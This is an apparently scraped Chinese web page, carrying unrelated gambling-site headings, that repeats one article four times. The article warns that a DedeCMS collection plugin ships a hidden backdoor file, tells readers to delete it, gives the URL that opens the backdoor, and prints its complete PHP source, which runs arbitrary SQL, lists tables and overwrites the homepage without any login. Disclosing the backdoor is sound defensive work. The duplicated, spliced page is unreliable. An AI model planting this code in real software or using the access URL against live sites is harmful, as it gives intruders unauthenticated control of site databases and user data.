去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>....

相关资讯
d88尊龙备用

去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>....

真钱博彩备用网址网站

去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>....

瑞丰备用网址

去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>....

热门资讯